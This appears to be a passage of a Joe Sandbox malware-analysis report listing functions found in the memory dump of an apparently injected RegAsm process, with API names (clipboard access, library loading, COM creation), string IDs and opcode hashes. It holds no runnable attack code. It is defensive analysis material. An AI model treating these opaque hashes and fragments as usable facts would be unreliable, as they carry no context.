        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
        • String ID:
        • API String ID: 2832541153-0
        • Opcode ID: e4fc1cfb410e398188d9cdd61d017191ab578a671e50b03f8011340b85fa8ab9
        • Instruction ID: b6a984cd688abb73c2aefde68673d6b489a3b97103906ed5501a92e29a96bcb5
        • Opcode Fuzzy Hash: e4fc1cfb410e398188d9cdd61d017191ab578a671e50b03f8011340b85fa8ab9
        • Instruction Fuzzy Hash: 4241C3B09087918FD711AB7CA44936FBFE0AB12314F448A2EE5E687382D7389445C7A7
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: +A$4`[b$LM$lA$GA$OI
        • API String ID: 0-1930206426
        • Opcode ID: 955869d99b5e6ad8ca8db3f0419d15f5a497f0a2b7a47a64e182ae06aed49700
        • Instruction ID: fc17c15144d4ff5a32766275bb861d0920c222670baeb389480fa2216419961f
        • Opcode Fuzzy Hash: 955869d99b5e6ad8ca8db3f0419d15f5a497f0a2b7a47a64e182ae06aed49700
        • Instruction Fuzzy Hash: 28628DB9E0021ACBDB14CF65D8517EEBBB2FF49304F1844A9D845AB381D7389A81CF95
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: YG$$E,C$4`[b$@A$tw
        • API String ID: 0-4039293858
        • Opcode ID: 98ed2851579c1087240f8ef7b37dcb4bbeab6563ccde78041436513c5038016b
        • Instruction ID: cb0f5d18f79ac97dedbe74008a5da037511d8f5a0ef1f77b3bce2ff90b284a3a
        • Opcode Fuzzy Hash: 98ed2851579c1087240f8ef7b37dcb4bbeab6563ccde78041436513c5038016b
        • Instruction Fuzzy Hash: 805289706083419FC324DF14C590BABBBF1EF86794F14991DE5CA8B3A1D7789891CB4A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 0$6$dTUl$ugs%${q
        • API String ID: 0-304012093
        • Opcode ID: 4976a6d2baece24130e1b0a3fcb55ad35979048744a9243212975826f559cb80
        • Instruction ID: 99eeb2df5c31e1a90e85cb19d4053094d62376da682691008a0c65975b1d07cf
        • Opcode Fuzzy Hash: 4976a6d2baece24130e1b0a3fcb55ad35979048744a9243212975826f559cb80
        • Instruction Fuzzy Hash: FB32B0B15083809FD725CF28D89076BBBE1AF96308F14487DE48997392D739D849CB9B
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: MetricsSystem
        • String ID:
        • API String ID: 4116985748-3916222277
        • Opcode ID: 4da66a750322a264b3ab46bce6a9bc0f7e9bbdb94c86139a9d82bac835fca592
        • Instruction ID: 1d26471e7ea84532a4efb49915bad08806d8bcb474f814dfe04d651a38b31342
        • Opcode Fuzzy Hash: 4da66a750322a264b3ab46bce6a9bc0f7e9bbdb94c86139a9d82bac835fca592
        • Instruction Fuzzy Hash: DD517FB0A152199FDB40EFACD98569EBBF0FB48314F10852DE898E7350E734A944CF96
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: BrC$RuC$bpC
        • API String ID: 0-3642957703
        • Opcode ID: 4968d85dbcf18465c32b06ccf56ca26348e8b8698d41734a233902f61c2cd173
        • Instruction ID: a4835479ec93e5188ea42a887852fc4a42eefb24cd75eba508af51fb8cb3e469
        • Opcode Fuzzy Hash: 4968d85dbcf18465c32b06ccf56ca26348e8b8698d41734a233902f61c2cd173
        • Instruction Fuzzy Hash: 5402E375A08205CFCB18CF58D8A06AEF7F2FF8A314F19956ED496A73A1C7349841CB45
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$GGK\$^h^Q
        • API String ID: 0-2872912935
        • Opcode ID: 2169fb1dd032ff6d31ef46d6ec9589c3c3650eee3fb03ac4b1539980b16d536a
        • Instruction ID: 3cd8d1e1c41e603c5c93e155d01071762f76977a7e9a1aaae1e6aea02b9bcd80
        • Opcode Fuzzy Hash: 2169fb1dd032ff6d31ef46d6ec9589c3c3650eee3fb03ac4b1539980b16d536a
        • Instruction Fuzzy Hash: 6DF116B5D00215CBDB14CFA8D8916EEB7B2FF4A304F18456DD452AB382D339AD41CB98
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: Cv$T_
        • API String ID: 0-3992343605
        • Opcode ID: 62964efafae275919db2a16468b5a1d5cfbce16f75e70a5a3d2c5c1138c2974a
        • Instruction ID: 662d89be9d82f12a7c629fde5f32865d19c63d9bb9ed09a829086dfe659df01c
        • Opcode Fuzzy Hash: 62964efafae275919db2a16468b5a1d5cfbce16f75e70a5a3d2c5c1138c2974a
        • Instruction Fuzzy Hash: 3C6189B4A0071A9FEB24CF51C9506AEFBB2FF85710F144A4DE4566B781C3B4A981CF98
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID: 4`[b$4`[b
        • API String ID: 2994545307-3640500014
        • Opcode ID: fd4a52381d1f65654b7c326e5fd9a73b784ddd7ad915ad5b03bf587c3378e191
        • Instruction ID: 7458254d1c59be6fc66bf96842a3cd610acc4fa8464edea4e9933930dc4074c6
        • Opcode Fuzzy Hash: fd4a52381d1f65654b7c326e5fd9a73b784ddd7ad915ad5b03bf587c3378e191
        • Instruction Fuzzy Hash: B421E0B4A10149EBDB28DB44C5A0BFEB3B2BF46301F60016AD54627390C3355E86CB6E
        APIs
        • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0041A4AD
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 989eca102f7cee1ca030cf1e134ebe17117486215e058b3edd1d62260e430d0c
        • Instruction ID: 0a539fd7b251266ca6aeb8dc8b8ee2014617db8b68d271518bbd60855bad5fd1
        • Opcode Fuzzy Hash: 989eca102f7cee1ca030cf1e134ebe17117486215e058b3edd1d62260e430d0c
        • Instruction Fuzzy Hash: 8B029B75A01216CFDB08CF59D890BAEB3B2FF49310F298568E905A7390D735AD61CF68
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: >
        • API String ID: 0-325317158
        • Opcode ID: 21e798d485bf375d464408bda4bb4bf1a229f337095336c45334b0f106a161a7
        • Instruction ID: 8259facfa4d72e284d91e44029ac28be40981d3b50f811c059009e5c2d446c87
        • Opcode Fuzzy Hash: 21e798d485bf375d464408bda4bb4bf1a229f337095336c45334b0f106a161a7
        • Instruction Fuzzy Hash: 7602BD71908341DBD724DF24D98176BB7E5AF86308F04483EE489A7392E739D849CB9A
        APIs
        • CoCreateInstance.OLE32(0043A538,00000000,00000001,0043A528), ref: 00419529
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: CreateInstance
        • String ID:
        • API String ID: 542301482-0
        • Opcode ID: 8975e62399cac8334eafbf92e2918394e892a4130022934ad95aa8776b406e53
        • Instruction ID: d1a297c9532ef30ee32ee644c92162e9ddbbc6b30ee2ccc97f8cc1c569a6bae3
        • Opcode Fuzzy Hash: 8975e62399cac8334eafbf92e2918394e892a4130022934ad95aa8776b406e53
        • Instruction Fuzzy Hash: 5E61FEB1600204ABDB209F24CCA2BB733B5EF85358F044919F9868B391F779EC41C76A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: bA
        • API String ID: 0-897489536
        • Opcode ID: 7482d01b80df6bc40d2c3d65559efc85ad07b8089b2a168badabdf8f91073795
        • Instruction ID: d1a4f7eaeb0abb483051988efb707b536b0882f396cb056f032a19d0f0101742
        • Opcode Fuzzy Hash: 7482d01b80df6bc40d2c3d65559efc85ad07b8089b2a168badabdf8f91073795
        • Instruction Fuzzy Hash: 65F1FE35E01251DFDB14CF29E8507AEBBB2AF4A310F1982B9D815AB3D1C375AC41CB98
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b
        • API String ID: 0-3962175265
        • Opcode ID: a6454fe60b1f8fbe79a0665ae9c2a227c0d3f87dad3fba587709f477586f9611
        • Instruction ID: f1f4c6ded27af21085a7077a2c68dd94d0c008b5438ea4ae1cf2bfb0ea619a7e
        • Opcode Fuzzy Hash: a6454fe60b1f8fbe79a0665ae9c2a227c0d3f87dad3fba587709f477586f9611
        • Instruction Fuzzy Hash: DDC1D1715082409BD714EF18C8A1AABB7F1FF86754F08891DE4C98B391E339ED85CB5A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "
        • API String ID: 0-123907689
        • Opcode ID: ace919209808e28087dd56c5bb8a9fb0a304e64fdf8f4e17bd78e06e369fcd95
        • Instruction ID: 5697b36e252d9d00e4ca3e4cf2bc48c673d24501c58607141feab8f0aa369dab
        • Opcode Fuzzy Hash: ace919209808e28087dd56c5bb8a9fb0a304e64fdf8f4e17bd78e06e369fcd95
        • Instruction Fuzzy Hash: FFD139B2B083205BD714CE25E45176BB7E99FA4354F48892FE895873A1E73CEC44C786
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: D D
        • API String ID: 0-1827101989
        • Opcode ID: 18ddaa935979de2736b64a67e72136690b84d056c6e7221c9576ec7ef005b8e0
        • Instruction ID: da4f6fb28d59b79a8dec70ff80a6c54bf496e2f4386aa29748d673addeb69069
        • Opcode Fuzzy Hash: 18ddaa935979de2736b64a67e72136690b84d056c6e7221c9576ec7ef005b8e0
        • Instruction Fuzzy Hash: 9BD19B71A0122ACBDB14CF99D8907EEB7B1FF49310F248169D855AB390C734AD51CFA8
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b
        • API String ID: 0-3962175265
        • Opcode ID: 966a12e0b1ffdc072d74dac2709a01afc599ebe41c205e04b9bf999f95f25af6
        • Instruction ID: efecaee907f98ab50834ab5f9efed63d3d8e3e45473ad0917a5c339f6626d56b
        • Opcode Fuzzy Hash: 966a12e0b1ffdc072d74dac2709a01afc599ebe41c205e04b9bf999f95f25af6
        • Instruction Fuzzy Hash: 8651A8B4900219CFEB10CF55D855BAFBBB1BF09300F2500A9E5056B3A2C379AE41CFA9
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b
        • API String ID: 0-3962175265
        • Opcode ID: 677fb2370ab64bd8b81499b6c0e5d05d593b3a615d93557008c7490987027133
        • Instruction ID: da3eea37be12eecfd639ede42aac42651ad1d2808f271e6f977b50812b37192f
        • Opcode Fuzzy Hash: 677fb2370ab64bd8b81499b6c0e5d05d593b3a615d93557008c7490987027133
        • Instruction Fuzzy Hash: 15312B74A102598BDB18CF54C6A07BFB7B2BF86301F2441A9C54A3B794C3745E46CB6A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: D
        • API String ID: 0-2746444292
        • Opcode ID: 7d8c4c917c3abe5dff92dcd396d84a39230e08a22d27918f18d52dd9b58031ab
        • Instruction ID: 9b5f4b658067e988bca34a5fbfec7578c51dc2a552032d173fce6399ca1d1002
        • Opcode Fuzzy Hash: 7d8c4c917c3abe5dff92dcd396d84a39230e08a22d27918f18d52dd9b58031ab
        • Instruction Fuzzy Hash: F03139B4409340AFE3208F51D9A971BFFF4BB92B49F10591CF2901A2A0D7FA9548CF96
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b
        • API String ID: 0-3962175265
        • Opcode ID: 397826cc36939d5b4beb34d8c220faf3923c92838371b7659d65e96a208c5ce1
        • Instruction ID: 2faf8b5da95e9ecde47bc5cfd0c7ce2ef621df0d45c09ae17488a617048dacf1
        • Opcode Fuzzy Hash: 397826cc36939d5b4beb34d8c220faf3923c92838371b7659d65e96a208c5ce1
        • Instruction Fuzzy Hash: 9E21F33420C7408BD309DF09C1A0A2FF7E2EF8AB15F64AA1DD1C617355C339A8518B8A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b
        • API String ID: 0-3962175265
        • Opcode ID: 6a296d5f2451af90d1960fe0239e3e71163005f617efc08d6a5686c1ee0d7fc2
        • Instruction ID: 9b66366bffb89bc80a59f85c1cffe6a5e35b9c10fc01e223207da8dfaad72b12
        • Opcode Fuzzy Hash: 6a296d5f2451af90d1960fe0239e3e71163005f617efc08d6a5686c1ee0d7fc2
        • Instruction Fuzzy Hash: 31111874A0515A8BDB18CF44C6607BFF7B1BF46301F2441A9C54A37791C3786E46CBAA
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 86784ee34380de8fbd6f870b8f95d8097dbd33ae0e3efcec15dff9367ee68fce
        • Instruction ID: 810a9337eace68b3a4dce74fef11a80e61cef102f773645e9cb7fa266db222de
        • Opcode Fuzzy Hash: 86784ee34380de8fbd6f870b8f95d8097dbd33ae0e3efcec15dff9367ee68fce
        • Instruction Fuzzy Hash: FD52E4B16083458BCB14CF28C0806ABBBE1BFC5314F198A7EE9D967391D778E945CB85
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 068655e75876c425d1279b5b077750cc74d873baf3c611e11fc7a02e085f60e1
        • Instruction ID: 155c97648d9e8306b11001f1ffe9ac2dc30d5153d9eee072c4c32168f1851c9e
        • Opcode Fuzzy Hash: 068655e75876c425d1279b5b077750cc74d873baf3c611e11fc7a02e085f60e1
        • Instruction Fuzzy Hash: 5EF1BD756083418FD724CF29C88166BFBE2AFD9304F088C2DE8D587792E639E944CB56
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 127459a40dd156f66946a3f3660c0b0ffd3fc61cae3ea7173ff9f99820ce6467
        • Instruction ID: c844b84ad5131b86cef9018f8ddeadb3a9ae053d1c6382ca92e20eca21e9be0d
        • Opcode Fuzzy Hash: 127459a40dd156f66946a3f3660c0b0ffd3fc61cae3ea7173ff9f99820ce6467
        • Instruction Fuzzy Hash: 10C137706083859FE320DF24D481BAFBBE5EF86389F44582DE4C997661E3389944CB1B
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 53d2c2f32efb1260e4e7ae0f06eb7a6ed9125c19ccaa1cf78237d68b6c5cbdd5
        • Instruction ID: fa2a3a229e10f124bd619c7aed6692ab061a0d4208a56b87d2f2a394e83bf1e6
        • Opcode Fuzzy Hash: 53d2c2f32efb1260e4e7ae0f06eb7a6ed9125c19ccaa1cf78237d68b6c5cbdd5
        • Instruction Fuzzy Hash: FE91AD742083068BC714EF18C490A2BF3E1EF89740F14992EF9958B351EB39EC51CB9A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID:
        • API String ID: 2994545307-0
        • Opcode ID: 526778f819f61164a63596b1379ae5de48033a98ca701539595140c6edf1c5fc
        • Instruction ID: 1228f0d22be123eb23f19b185b4996638aff095672854f9e815ad5e08f8fbe31
        • Opcode Fuzzy Hash: 526778f819f61164a63596b1379ae5de48033a98ca701539595140c6edf1c5fc
        • Instruction Fuzzy Hash: 7A81C1342083429BD711DF18C880A2BF7E2EF99754F14991DF5C49B361EB39EC518B9A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8004d71d8110e8df4639a8a646969a19bbcd0153aeb6b77dfefdd36515859b99
        • Instruction ID: a046821352e3d0a8a7b4ffffd7799053798f3b3f72d958c59e966be740c9e683
        • Opcode Fuzzy Hash: 8004d71d8110e8df4639a8a646969a19bbcd0153aeb6b77dfefdd36515859b99
        • Instruction Fuzzy Hash: D4919071E00216CFCB18CF69D8917AEF7B1FF89304F1841A9D515AB392D738A986CB94
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e834a441b260eb3ccc8811f3165624c006a58da777ab1f15c5f3702d2b9e48ef
        • Instruction ID: 487874ed3c41d75b4920d22756bd8cdcdebd8722e78173755f277ff4a3938371
        • Opcode Fuzzy Hash: e834a441b260eb3ccc8811f3165624c006a58da777ab1f15c5f3702d2b9e48ef
        • Instruction Fuzzy Hash: C571A8B05483408BD314DF18D891A6BBBF1EF96758F148A1EF4C54B3A1E338D985CB9A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 36ef418476adb566e43b49e5732d9a53f311a4899256dd8fe7f64fc6246cdc27
        • Instruction ID: a5917ed31327660eaa28ee78c62b5f499c8c4aee543db057b85df56000fe2ca2
        • Opcode Fuzzy Hash: 36ef418476adb566e43b49e5732d9a53f311a4899256dd8fe7f64fc6246cdc27
        • Instruction Fuzzy Hash: 9F61B4B15007019FE3149F28DC48217BBE5FF80329F184739E46A663E1D335EA65CB8A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6a6b4d7ee066099356e3574cf8ee8f9d5a9defec433db4738040a979379c2b12
        • Instruction ID: 99c7b2ddef0afe3769d9cf043a42036a192323817deed2b617bef494d33a732a
        • Opcode Fuzzy Hash: 6a6b4d7ee066099356e3574cf8ee8f9d5a9defec433db4738040a979379c2b12
        • Instruction Fuzzy Hash: A931D275B083188BC714EF59CC8166BF3E6EFC9704F18E62EE48487315E679D906878A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6a720fd7d43ecb916973c07741c259b36a8589bfc121c9cbd37e4543aa0589a1
        • Instruction ID: 70406dad0a3fa19ae1fbf81b6ba44d22e2a92980d0e3a4639aa21cd3a5e6e6ef
        • Opcode Fuzzy Hash: 6a720fd7d43ecb916973c07741c259b36a8589bfc121c9cbd37e4543aa0589a1
        • Instruction Fuzzy Hash: D221BCB560C301ABD724CF04C880A6BB7E2EFCA744F14981EE8948B341D334DD00DB9A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a89dac40d8bd930fe6dec24184eea1d47cbdb1e84e9b503c54542638d50c5976
        • Instruction ID: 8ceb307f1a867d2a2ce871a9809c692d6971833a58326fc0df80769d2fa7ace5
        • Opcode Fuzzy Hash: a89dac40d8bd930fe6dec24184eea1d47cbdb1e84e9b503c54542638d50c5976
        • Instruction Fuzzy Hash: 9B21AC7050C3428BD300DF14D88022BBBE0FB9A355F149C2EE085CB261C339D889EB9A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction ID: 74e947de6701331a9ca873405e70773d52ced5a4fd02c3e57fb06152c70883a6
        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction Fuzzy Hash: B3112C33B041E40EC3128D3C9450575BFE34A93374F5D839AF4B8972D6D7268D8A83A9
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0407378e7c1988491149c353f1688655eee10492070306ef73fee88f655f93dc
        • Instruction ID: 3342cd56ed713b768d3fee182a2bf905e26c6f010b6d698aca076d041a9fdaa1
        • Opcode Fuzzy Hash: 0407378e7c1988491149c353f1688655eee10492070306ef73fee88f655f93dc
        • Instruction Fuzzy Hash: 5001D8F2B0031157E7209E52A4C1737B3A85FA9718F48453EEA0457352DB7EEC25C299
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d9cd90493afbcf3a787d40e6ae72a867081c24d3f7d07c59518c094a7ede77d4
        • Instruction ID: fb9c94caa665f87f385907187c6146c9335815fe2eddb3d43803afd4d04e7f54
        • Opcode Fuzzy Hash: d9cd90493afbcf3a787d40e6ae72a867081c24d3f7d07c59518c094a7ede77d4
        • Instruction Fuzzy Hash: 7E21B7F0904B00AFD360EF39C906757BEE8EB49250F108A1EF9EA87791D771A4158BD6
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: abe7fe7d5d5a14378e794d14dee7d493a8db410d2c09c2598efe69584864b76e
        • Instruction ID: 0744f078a3171a0580d2e94a6004f0e5a604781e0de8b4b0d6ae5927e8051cc6
        • Opcode Fuzzy Hash: abe7fe7d5d5a14378e794d14dee7d493a8db410d2c09c2598efe69584864b76e
        • Instruction Fuzzy Hash: 9E115A71504B05CFE324AF19C882522B7F0FF16302F041AAEC1D5A7721D339E596CB8A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: cc14459cc490d62ef50881fd369e13876f86137c13df765c3e224478c1acded9
        • Instruction ID: 864ccd0fb000f695d90a634c81a09cfdd4fb7e0675c21685558bf5890387d05a
        • Opcode Fuzzy Hash: cc14459cc490d62ef50881fd369e13876f86137c13df765c3e224478c1acded9
        • Instruction Fuzzy Hash: 44F0ECB160411077DB228E559CC0FB7BB9DCB87315F1D0426E88557242D1655986C3EA
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 99a30cb5aceca96eacf9c01e44222f8d84da01fef9bdfeb224193977f6be1824
        • Instruction ID: 8e02ec3fbb21446d0e3b3abb1bf3f96b314bcfd9f6689de6b1aee77edabc22c4
        • Opcode Fuzzy Hash: 99a30cb5aceca96eacf9c01e44222f8d84da01fef9bdfeb224193977f6be1824
        • Instruction Fuzzy Hash: 03F0F63060C2418FD309EF15C4A092BBBF6EF96745F21991EE1C2472A1D63598A5CB9A
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
